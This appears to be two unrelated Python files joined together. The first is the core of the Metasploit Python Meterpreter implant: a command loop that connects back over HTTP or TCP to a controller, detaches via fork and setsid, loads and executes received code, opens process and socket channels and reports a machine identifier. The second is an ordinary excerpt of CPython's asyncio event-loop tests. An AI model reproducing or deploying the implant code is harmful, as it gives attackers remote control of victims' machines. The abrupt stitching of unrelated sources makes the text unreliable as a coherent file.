class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = self.next_channel_id
self.channels[idx] = channel
debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_set_uuid(self, request, response):
new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
if new_uuid:
PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value'])
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_native_arch(self, request, response):
response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE, response
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter':self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
debug_print('[*] closed and removed channel id: ' + str(channel_id))
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
resp += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
if result != ERROR_SUCCESS:
debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
# PATCH-SETUP-STAGELESS-TCP-SOCKET #
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
|
test_events.py
|
"""Tests for events.py."""
import collections.abc
import concurrent.futures
import functools
import io
import os
import platform
import re
import signal
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import threading
import time
import errno
import unittest
from unittest import mock
import weakref
if sys.platform != 'win32':
import tty
import asyncio
from asyncio import coroutines
from asyncio import events
from asyncio import proactor_events
from asyncio import selector_events
from test.test_asyncio import utils as test_utils
from test import support
from test.support import ALWAYS_EQ, LARGEST, SMALLEST
def tearDownModule():
asyncio.set_event_loop_policy(None)
def broken_unix_getsockname():
"""Return True if the platform is Mac OS 10.4 or older."""
if sys.platform.startswith("aix"):
return True
elif sys.platform != 'darwin':
return False
version = platform.mac_ver()[0]
version = tuple(map(int, version.split('.')))
return version < (10, 5)
def _test_get_event_loop_new_process__sub_proc():
async def doit():
return 'hello'
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop.run_until_complete(doit())
class CoroLike:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
class MyBaseProto(asyncio.Protocol):
connected = None
done = None
def __init__(self, loop=None):
self.transport = None
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.connected = asyncio.Future(loop=loop)
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
if self.connected:
self.connected.set_result(None)
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyProto(MyBaseProto):
def connection_made(self, transport):
super().connection_made(transport)
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = asyncio.Future(loop=loop)
self.completed = asyncio.Future(loop=loop)
self.disconnects = {fd: asyncio.Future(loop=loop) for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
